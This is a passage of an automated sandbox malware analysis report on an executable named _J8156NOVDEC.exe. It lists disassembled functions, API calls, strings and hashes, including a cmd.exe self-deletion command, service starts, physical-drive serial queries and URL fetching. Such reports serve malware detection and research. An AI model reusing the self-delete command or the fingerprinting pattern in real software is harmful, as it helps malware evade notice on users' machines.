    • API ID: File$ModuleName$Exception@8SleepThrow$CloseCopyCreateCtrlDispatcherErrorEventHandleLastServiceStart_wcsrchrstd::invalid_argument::invalid_argument
    • String ID: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe$\xo$string too long
    • API String ID: 1238941938-3394848091
    • Opcode ID: 6d2a4ec511a9300ef295c4bd16aee91795d8cb807623b37bfa0b2fb39ea2ccdf
    • Instruction ID: 6024e36c242810f52276b80ebf63105e649e26a40098d70b461f76e8f37bc043
    • Opcode Fuzzy Hash: 6d2a4ec511a9300ef295c4bd16aee91795d8cb807623b37bfa0b2fb39ea2ccdf
    • Instruction Fuzzy Hash: 0BA1EF71D002199BDB14EFA4CC99BEEBBB7FF04300F10415CE505AB291DB75AA89CBA5
    Function 00633F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00635020: GetModuleFileNameA.KERNEL32(00000000,?,00000080,?,00633F35,?,?,00000080), ref: 0063503F
    • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00633F67
    • ExitProcess.KERNEL32 ref: 00633F6F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ExecuteExitFileModuleNameProcessShell
    • String ID: /c ping -n 3 127.1 >nul & del /q %s$cmd.exe$open
    • API String ID: 1425974386-2322895437
    • Opcode ID: 624039afe26d4ace10207f3ad3e090d697e191eaf63d971410a8f1b212766eb3
    • Instruction ID: 5704c568be49ee4bf2b39fe3d672b8eb77b5aa6ace0d3d5bba2f7b8f786767b8
    • Opcode Fuzzy Hash: 624039afe26d4ace10207f3ad3e090d697e191eaf63d971410a8f1b212766eb3
    • Instruction Fuzzy Hash: 6AF054B194430CBBEF50EBA0DD46F99737DAB04700F4044A1B748E61C2EA70A7098BA5
    Function 00641DA0 Relevance: 7.5, APIs: 5, Instructions: 30serviceCOMMON
    Download Yara Rule
    APIs
    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,?,006320F2), ref: 00641DA7
    • OpenServiceW.ADVAPI32(00000000,006F6DD8,00000034), ref: 00641DBC
    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00641DCD
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00641DDA
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00641DE1
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Service$CloseHandleOpen$ManagerStart
    • String ID:
    • API String ID: 1485051382-0
    • Opcode ID: a36b39139fe6f8b005c32ec4682aac023e478788bae0a9316e59793934c7ad84
    • Instruction ID: cf87dc3c04af91ce2a591177222497de51bb7bca438d6a64b19203fa147f34dd
    • Opcode Fuzzy Hash: a36b39139fe6f8b005c32ec4682aac023e478788bae0a9316e59793934c7ad84
    • Instruction Fuzzy Hash: 32E09232681B2077D3322314AC49F9E56275FC2F52F160110F604BF2D48EA49A0645A0

    Non-executed Functions

    Function 0069BA80 Relevance: 72.7, APIs: 25, Strings: 16, Instructions: 923networkCOMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 0069BB88
    • _strlen.LIBCMT ref: 0069BBA0
    • _strlen.LIBCMT ref: 0069BBC0
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BC61
    • _strncpy.LIBCMT ref: 0069BC93
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BCC8
    • _strncpy.LIBCMT ref: 0069BD50
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BD86
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BDCC
    • getsockname.WS2_32(?,?,00000080), ref: 0069BF22
    • WSAGetLastError.WS2_32(?,00000080,?,?), ref: 0069BF41
    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0069C143
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069C852
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$_strlen$ErrorLast_strncpy$CheckStackVars@8getsockname
    • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$@'$A$Failure sending EPRT command: %s$Failure sending PORT command: %s$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$getsockname() failed: %s$getsockname() failed: %s$socket failure: %s$socket failure: %s
    • API String ID: 673287134-299674065
    • Opcode ID: ff3ae7551b010389b2d8ef11a155cd4f0ef335434455790e711ed6ad32fbd54d
    • Instruction ID: 869ef2881d2122fb01b6b6838411d148772eeb659d099ab2e55817d444944535
    • Opcode Fuzzy Hash: ff3ae7551b010389b2d8ef11a155cd4f0ef335434455790e711ed6ad32fbd54d
    • Instruction Fuzzy Hash: 0B82A2B1E003289BDF64DB54DC41BEEB77AAF4A304F0441D9E509A7682DB349E81CF96
    Function 006B03E0 Relevance: 59.9, APIs: 18, Strings: 16, Instructions: 426fileCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00000080,?), ref: 006B045E
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,00664304,?,?,00000080), ref: 006A593A
      • Part of subcall function 006A5920: _strncpy.LIBCMT ref: 006A598E
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A06
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A2E
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,?,?,?,?,?,?,00664304), ref: 006A5A68
      • Part of subcall function 006A5920: SetLastError.KERNEL32(00000080,?,?,?,?,?,?,?,00664304), ref: 006A5A80
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 006B04AE
    • GetLastError.KERNEL32(?,00000080), ref: 006B04D2
    • CloseHandle.KERNEL32(000000FF), ref: 006B0961
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B09A7
    Strings
    • schannel: CA file '%s' is not correctly formatted, xrefs: 006B074F
    • schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 006B08ED
    • schannel: added %d certificate(s) from CA file '%s', xrefs: 006B0944
    • schannel: failed to determine size of CA file '%s': %s, xrefs: 006B054E
    • schannel: did not add any certificates from CA file '%s', xrefs: 006B0929
    • -----BEGIN CERTIFICATE-----, xrefs: 006B06D9
    • M, xrefs: 006B08FE
    • -----END CERTIFICATE-----, xrefs: 006B06A5
    • schannel: failed to read from CA file '%s': %s, xrefs: 006B0652
    • schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 006B0860
    • schannel: CA file exceeds max size of %u bytes, xrefs: 006B0581
    • -----BEGIN CERTIFICATE-----, xrefs: 006B06F9
    • schannel: invalid path name for CA file '%s': %s, xrefs: 006B0479
    • schannel: failed to open CA file '%s': %s, xrefs: 006B04ED
    • schannel: failed to extract certificate from CA file '%s': %s, xrefs: 006B081C
    • -----END CERTIFICATE-----, xrefs: 006B0728
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$CheckStackVars@8_strrchr$CloseCreateFileHandle_strlen_strncpy
    • String ID: -----END CERTIFICATE-----$-----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$-----BEGIN CERTIFICATE-----$M$schannel: CA file '%s' is not correctly formatted$schannel: CA file exceeds max size of %u bytes$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to determine size of CA file '%s': %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
    • API String ID: 4084252120-2431966791
    • Opcode ID: baf85009b9d8feabcff6815e782fef225362cda263d2d21935e0dffe955c7e0e
    • Instruction ID: 7062d41f2d0bdb55827058b24046b45f16f4149f12d20e45cb8837f940bc8548
    • Opcode Fuzzy Hash: baf85009b9d8feabcff6815e782fef225362cda263d2d21935e0dffe955c7e0e
    • Instruction Fuzzy Hash: CDF181F1D00218EFEB54EB94DC86BEEBBBAAB05304F104198F51977282DB745A84CF95
    Function 00680250 Relevance: 55.2, APIs: 10, Strings: 21, Instructions: 970libraryloaderCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleA.KERNEL32(ntdll,wine_get_version,?,?,?), ref: 00680378
    • GetProcAddress.KERNEL32(00000000), ref: 00680386
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006810B3
    Strings
    • schannel: ALPN, offering %s, xrefs: 00680D27
    • ntdll, xrefs: 00680373
    • schannel: initial InitializeSecurityContext failed: %s, xrefs: 00680F6C
    • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 0068034B
    • schannel: Failed to open cert store %x %s, last error is %x, xrefs: 0068090D
    • schannel: using IP address, SNI is not supported by OS., xrefs: 00680C1E
    • wine_get_version, xrefs: 0068036C
    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 0068048B
    • schannel: AcquireCredentialsHandle failed: %s, xrefs: 00680B7C
    • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 00681056
    • http/1.1, xrefs: 00680D22
    • Microsoft Unified Security Protocol Provider, xrefs: 00680B04
    • schannel: SNI or certificate check failed: %s, xrefs: 00680FA3
    • schannel: Failed to get certificate location for %s, xrefs: 0068088E
    • Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 00680806
    • http/1.1, xrefs: 00680CF8
    • , xrefs: 006805F1
    • schannel: unable to allocate memory, xrefs: 00680E1A
    • Unrecognized parameter passed via CURLOPT_SSLVERSION, xrefs: 006806DF
    • schannel: unable to allocate memory, xrefs: 00680A83
    • schannel: initial InitializeSecurityContext failed: %s, xrefs: 00680FDA
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: AddressCheckHandleModuleProcStackVars@8
    • String ID: $Microsoft Unified Security Protocol Provider$Unable to set ciphers to passed via SSL_CONN_CONFIG$Unrecognized parameter passed via CURLOPT_SSLVERSION$http/1.1$http/1.1$ntdll$schannel: ALPN, offering %s$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate location for %s$schannel: Failed to open cert store %x %s, last error is %x$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
    • API String ID: 3711174304-2518537087
    • Opcode ID: 7a37161099800ad6dd0d449ad885c73e881d65334ecb1b47fb29373916ad5286
    • Instruction ID: 4918ed5116e33d097181897bf97908cf49bcaac8d4a7e365b7c50f98e3f0d1ce
    • Opcode Fuzzy Hash: 7a37161099800ad6dd0d449ad885c73e881d65334ecb1b47fb29373916ad5286
    • Instruction Fuzzy Hash: 0692C2B0A00219DFEB64DF54C895BEEB7B6BB48304F1486A8E5096B381D7719EC5CF90
    Function 00665120 Relevance: 47.8, APIs: 17, Strings: 10, Instructions: 501COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$ho$lo
    • API String ID: 3286693010-4200049518
    • Opcode ID: 02cbc57ff968f631e588eda6b8dbe54e94bc1afbf78763d2fba0e2e9c76739bd
    • Instruction ID: 6b66969e1d4d329559c6707be7a4e9baf3da88a73c790fce737d52ff2818578d
    • Opcode Fuzzy Hash: 02cbc57ff968f631e588eda6b8dbe54e94bc1afbf78763d2fba0e2e9c76739bd
    • Instruction Fuzzy Hash: 3E2280B5900228DBDB64DB54CC86BE9B776AF49304F0481DDE80EA7351DB719E84CF92
    Function 0067D2A0 Relevance: 27.3, APIs: 18, Instructions: 269networkCOMMON
    Download Yara Rule
    APIs
    • socket.WS2_32(00000002,00000001,00000006), ref: 0067D2D7
    • htonl.WS2_32(7F000001), ref: 0067D315
    • setsockopt.WS2_32(000000FF,0000FFFF,00000004,00000001,00000004), ref: 0067D362
    • closesocket.WS2_32(000000FF), ref: 0067D571
    • closesocket.WS2_32(00000004), ref: 0067D58F
    • closesocket.WS2_32 ref: 0067D5AD
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067D5C7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: closesocket$CheckStackVars@8htonlsetsockoptsocket
    • String ID:
    • API String ID: 1730456080-0
    • Opcode ID: 2ab0964aaf56cf04946db71fae1c6910938b232cb5225f8e49cb42304d21a9b7
    • Instruction ID: a3fdeb049854b6204c70cafcbf97ffe7f98255572e36d1c33561756c5e0d85dc
    • Opcode Fuzzy Hash: 2ab0964aaf56cf04946db71fae1c6910938b232cb5225f8e49cb42304d21a9b7
    • Instruction Fuzzy Hash: B7A1F9719002149BEB14EBA8D882BED7777EF45720F504728FA29EB2D1DA349D41C7E1
    Function 00635A90 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 462networkfileCOMMON
    Download Yara Rule
    APIs
    • InternetOpenW.WININET(UrlTest1,00000000,00000000,00000000,00000000), ref: 00635B5E
    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,04000000,00000000), ref: 00635B82
    • InternetReadFile.WININET(00000000,?,000003FF,00000000), ref: 00635C3E
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 00635C71
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 00635CBF
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00635CD4
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00635D0C
    • InternetCloseHandle.WININET(00000000), ref: 00635ED2
    • InternetCloseHandle.WININET(?), ref: 00635FA1
    • GetLastError.KERNEL32 ref: 00635FD6
    • InternetGetLastResponseInfoA.WININET(?,?,?), ref: 00635FF7
      • Part of subcall function 00636110: std::locale::_Init.LIBCPMT ref: 00636158
      • Part of subcall function 00636110: std::_Lockit::_Lockit.LIBCPMT ref: 0063616F
      • Part of subcall function 00636110: std::_Lockit::_Lockit.LIBCPMT ref: 00636191
      • Part of subcall function 00636110: std::_Lockit::~_Lockit.LIBCPMT ref: 006361B1
      • Part of subcall function 00636110: std::_Facet_Register.LIBCPMT ref: 00636216
      • Part of subcall function 00636110: std::_Lockit::~_Lockit.LIBCPMT ref: 00636232
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Internet$std::_$ByteCharLockitMultiWide$CloseHandleLastLockit::_Lockit::~_Open$ErrorFacet_FileInfoInitReadRegisterResponsestd::locale::_
    • String ID: UrlTest1$network_err
    • API String ID: 1830447136-3424925398
    • Opcode ID: 65a15bc1eacfdb10b996e69dfaa58e28ebdf9bf26b799ed11a578678b2ec7aa3
    • Instruction ID: 4c0b4bc91f46b65733c6d06a26dfe12fe50ab35fbcda6b44137540099924f170
    • Opcode Fuzzy Hash: 65a15bc1eacfdb10b996e69dfaa58e28ebdf9bf26b799ed11a578678b2ec7aa3
    • Instruction Fuzzy Hash: 3602C5B1A006149FDB24DB28CD45BEEB7B6EF45300F14429DE609AB2D1DB716E84CF98
    Function 00632CF0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileA.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 00632D49
    • GetLastError.KERNEL32 ref: 00632D6B
    • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 00632DD2
    • GetLastError.KERNEL32 ref: 00632DDC
    • DeviceIoControl.KERNEL32(?,0007C088,00000000,00000021,00000000,00000221,?,00000000), ref: 00632E60
    • CloseHandle.KERNEL32(?,-00000010,?), ref: 00632F41
    Strings
    • %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d, xrefs: 00632D7F
    • %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d, xrefs: 00632E05
    • SMART_RCV_DRIVE_DATA IOCTL, xrefs: 00632E7C
    • \\.\PhysicalDrive%d, xrefs: 00632D11
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ControlDeviceErrorLast$CloseCreateFileHandle
    • String ID: %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d$%d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d$SMART_RCV_DRIVE_DATA IOCTL$\\.\PhysicalDrive%d
    • API String ID: 1527324045-921166951
    • Opcode ID: 426a3595bdfbb4f5338830f25aaec8a6b228a39937158f2fe632e9d52cacc1a8
    • Instruction ID: bd6b22c8c0f666949bf8f547bd15b9df2dc6e7d6e273655159d10882e25de523
    • Opcode Fuzzy Hash: 426a3595bdfbb4f5338830f25aaec8a6b228a39937158f2fe632e9d52cacc1a8
    • Instruction Fuzzy Hash: 52611531A443415BD320DB28DC06FFF77AAEFD5310F01461DF649AB182EB70A5848796
    Function 00632A30 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 198fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00632A93
    • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?), ref: 00632B16
    • GetLastError.KERNEL32 ref: 00632B20
    • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?,00000210,?,00000000), ref: 00632C03
    • CloseHandle.KERNEL32(00000000), ref: 00632CC8
    Strings
    • %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d, xrefs: 00632B3D
    • %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE, xrefs: 00632ABC
    • \\.\PhysicalDrive%d, xrefs: 00632A58
    • %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d), xrefs: 00632B75
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ControlDevice$CloseCreateErrorFileHandleLast
    • String ID: %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE$%d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d$%d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)$\\.\PhysicalDrive%d
    • API String ID: 3154202731-1836870114
    • Opcode ID: 94e9cfd217d3929cf6766ef209744100fbeaccf31ca31d8b8acdeb58fc36f011
    • Instruction ID: 7d00d9792087c972201b0504d64774587ea8fddd7f3aa56b807c7667855f5566
    • Opcode Fuzzy Hash: 94e9cfd217d3929cf6766ef209744100fbeaccf31ca31d8b8acdeb58fc36f011
    • Instruction Fuzzy Hash: C0714B31A483415EE311DF34DC06BFBB7D9EF95704F10461DF584AB282EB7095898796
    Function 006330D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 0063312B
    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 006331D7
    • DeviceIoControl.KERNEL32(00000000,000700A0,00000000,00000000,?,00002710,?,00000000), ref: 006332FF
    • GetLastError.KERNEL32(?,?,00002710), ref: 00633327
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00002710), ref: 0063334F
    Strings
    • DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d, xrefs: 00633340
    • %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE, xrefs: 00633155
    • \\.\PhysicalDrive%d, xrefs: 006330FD
    • %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0, xrefs: 00633320
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ControlDevice$CloseCreateErrorFileHandleLast
    • String ID: %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE$%s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0$DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d$\\.\PhysicalDrive%d
    • API String ID: 3154202731-3012117823
    • Opcode ID: 8a808d415cbc76d3744590f218baf245edb9584b36d54b5e13aff1c2211744a9
    • Instruction ID: 0e939fe4071ba8c2f09494be40ca77b2966a5799801e16e602c9d61c03fef693
